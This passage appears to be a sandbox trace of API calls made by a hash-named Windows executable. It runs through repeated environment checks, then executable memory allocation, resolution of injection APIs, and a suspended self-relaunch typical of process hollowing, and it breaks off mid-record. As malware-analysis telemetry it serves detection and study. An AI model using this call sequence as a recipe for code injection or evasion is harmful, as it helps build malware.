hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.188] GetSystemDefaultLangID () returned 0x230409 [0068.188] GetThreadLocale () returned 0x409 [0068.188] GetCurrentProcess () returned 0xffffffff [0068.188] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.189] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.189] GetSystemDefaultLangID () returned 0x230409 [0068.189] GetThreadLocale () returned 0x409 [0068.189] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.190] GetCurrentProcess () returned 0xffffffff [0068.190] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.190] GetSystemDefaultLangID () returned 0x230409 [0068.190] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.191] GetThreadLocale () returned 0x409 [0068.191] GetCurrentProcess () returned 0xffffffff [0068.191] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.191] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.192] GetSystemDefaultLangID () returned 0x230409 [0068.192] GetThreadLocale () returned 0x409 [0068.192] GetCurrentProcess () returned 0xffffffff [0068.192] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.193] GetSystemDefaultLangID () returned 0x230409 [0068.193] GetThreadLocale () returned 0x409 [0068.193] GetCurrentProcess () returned 0xffffffff [0068.193] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.194] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.194] GetSystemDefaultLangID () returned 0x230409 [0068.194] GetThreadLocale () returned 0x409 [0068.194] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.195] GetCurrentProcess () returned 0xffffffff [0068.195] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.195] GetSystemDefaultLangID () returned 0x230409 [0068.195] GetThreadLocale () returned 0x409 [0068.196] GetCurrentProcess () returned 0xffffffff [0068.196] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.196] GetSystemDefaultLangID () returned 0x230409 [0068.196] GetThreadLocale () returned 0x409 [0068.196] GetCurrentProcess () returned 0xffffffff [0068.196] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.196] GetSystemDefaultLangID () returned 0x230409 [0068.196] GetThreadLocale () returned 0x409 [0068.196] GetCurrentProcess () returned 0xffffffff [0068.196] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0068.196] GetSystemDefaultLangID () returned 0x230409 [0068.196] GetThreadLocale () returned 0x409 [0068.890] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0068.891] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0068.891] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0068.891] VirtualProtect (in: lpAddress=0x2540020, dwSize=0x91148, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0069.035] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0069.035] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0069.035] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0069.035] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0069.035] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0069.035] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0069.036] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0069.036] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0069.036] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0069.042] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0069.045] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3d10000 [0069.101] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0069.102] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0069.102] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0069.102] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0069.102] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0069.103] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0069.104] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0069.104] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0069.104] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0069.104] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0069.104] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0069.104] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0069.112] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0069.112] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0069.112] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0069.112] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0069.113] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0069.113] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0069.113] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0069.113] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0069.114] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0069.114] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0069.114] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0069.114] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0069.116] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0069.116] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0069.116] RegisterClassExA (param_1=0x18e260) returned 0x25c1d1 [0069.118] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x60050 [0069.825] PostMessageA (hWnd=0x60050, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0069.825] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0069.826] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0069.826] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x390000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x5f [0069.826] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0069.827] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" " [0069.827] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" ", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xee8, dwThreadId=0xeec)) returned 1 [0069.842] VirtualFree (lpAddress=0x390000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.843] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0069.844] GetThreadContext (in: hThread=0x74, lpContext=0x390000 | out: lpContext=0x390000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), 